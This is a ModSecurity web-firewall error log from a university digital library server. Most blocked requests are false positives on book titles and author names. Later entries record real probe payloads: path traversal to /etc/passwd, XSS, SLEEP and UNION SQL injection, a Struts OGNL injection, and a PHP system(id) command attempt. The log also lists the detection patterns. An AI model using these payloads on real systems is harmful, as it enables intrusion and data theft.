[Tue Aug 29 06:52:36.243544 2023] [:error] [pid 60920] [client 52.167.144.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22LAW\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0zRMCo-f0AAO346FAAAAAO"]
[Tue Aug 29 08:15:48.542095 2023] [:error] [pid 62202] [client 47.128.30.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PRAJNANTA, FINAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1GxMCo-f0AAPL6nEsAAAAW"]
[Tue Aug 29 08:52:56.879169 2023] [:error] [pid 62544] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22AHMAD, KOMARUDDIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1PeMCo-f0AAPRQeRwAAAAH"]
[Tue Aug 29 09:03:53.444995 2023] [:error] [pid 62658] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KAIDAH FIQH JINAYAH (ASA -ASA HUKUM PIDANAN ISLAM)\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1SCcCo-f0AAPTC2hkAAAAK"]
[Tue Aug 29 09:16:40.363777 2023] [:error] [pid 63171] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/persons/person.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZO1VCMCo-f0AAPbD@RsAAAAW"]
[Tue Aug 29 09:26:36.403892 2023] [:error] [pid 63496] [client 47.128.19.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22JOGIYANTO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1XXMCo-f0AAPgIY2YAAAAF"]
[Tue Aug 29 09:41:03.030116 2023] [:error] [pid 63694] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MPR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1av8Co-f0AAPjO7hAAAAAp"]
[Tue Aug 29 09:54:08.406998 2023] [:error] [pid 64151] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAJEMEN OPRASIONAL STRATEGI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1d0MCo-f0AAPqX9oIAAAAE"]
[Tue Aug 29 10:04:17.638476 2023] [:error] [pid 64267] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MAHMUD,\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1gMcCo-f0AAPsL8NcAAAAR"]
[Tue Aug 29 10:17:18.511831 2023] [:error] [pid 64650] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PEREKONOMIAN INDONESIA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1jPsCo-f0AAPyKUFoAAAAP"]
[Tue Aug 29 10:18:56.473696 2023] [:error] [pid 64667] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22YAHYA, FITRIYA FAUZI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1joMCo-f0AAPybXPMAAAAJ"]
[Tue Aug 29 10:19:00.696368 2023] [:error] [pid 64651] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Chu-Kia Wang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1jpMCo-f0AAPyLgSQAAAAR"]
[Tue Aug 29 10:21:46.453518 2023] [:error] [pid 64672] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ricky W.Griffin\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1kSsCo-f0AAPygaMMAAAAQ"]
[Tue Aug 29 10:30:49.468190 2023] [:error] [pid 64814] [client 40.77.167.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sejarah Jawa Barat\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1macCo-f0AAP0uQRwAAAAD"]
[Tue Aug 29 10:34:36.853004 2023] [:error] [pid 64718] [client 90.156.168.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-22.php"] [unique_id "ZO1nTMCo-f0AAPzOCVkAAAAM"]
[Tue Aug 29 10:40:00.724481 2023] [:error] [pid 64961] [client 157.55.39.215] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BELAJAR OTODIDAK PEMROGRAMAN WEB DENGAN PHP   ORAC\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1okMCo-f0AAP3BQDkAAAAB"]
[Tue Aug 29 11:04:29.417486 2023] [:error] [pid 65420] [client 52.167.144.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22DIAGNOSIS FISIS PADA ANAK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1uTcCo-f0AAP@MV0gAAAAH"]
[Tue Aug 29 11:11:56.678824 2023] [:error] [pid 602] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BUKU PANDUAN MENTOR MENTORING PERKULIAHAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1wDMCo-f0AAAJapC4AAAAA"]
[Tue Aug 29 11:17:36.473241 2023] [:error] [pid 621] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ADOLF, HUALA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1xYMCo-f0AAAJtuHwAAAAB"]
[Tue Aug 29 11:19:56.021081 2023] [:error] [pid 724] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO1x7MCo-f0AAALU6RMAAAAM"]
[Tue Aug 29 11:20:00.834591 2023] [:error] [pid 724] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO1x8MCo-f0AAALU6RQAAAAM"]
[Tue Aug 29 11:30:10.859925 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10UsCo-f0AAAOYZhAAAAAB"]
[Tue Aug 29 11:30:10.941273 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10UsCo-f0AAAO-1nEAAAAI"]
[Tue Aug 29 11:30:11.806607 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAAPGfq8AAAAV"]
[Tue Aug 29 11:30:12.652001 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPLwAwAAAAX"]
[Tue Aug 29 11:30:13.350882 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPS5vQAAAAh"]
[Tue Aug 29 11:30:13.439291 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAPLwBYAAAAX"]
[Tue Aug 29 11:30:15.348261 2023] [:error] [pid 960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPAex0AAAAL"]
[Tue Aug 29 11:30:15.351933 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAANh1o8AAAAA"]
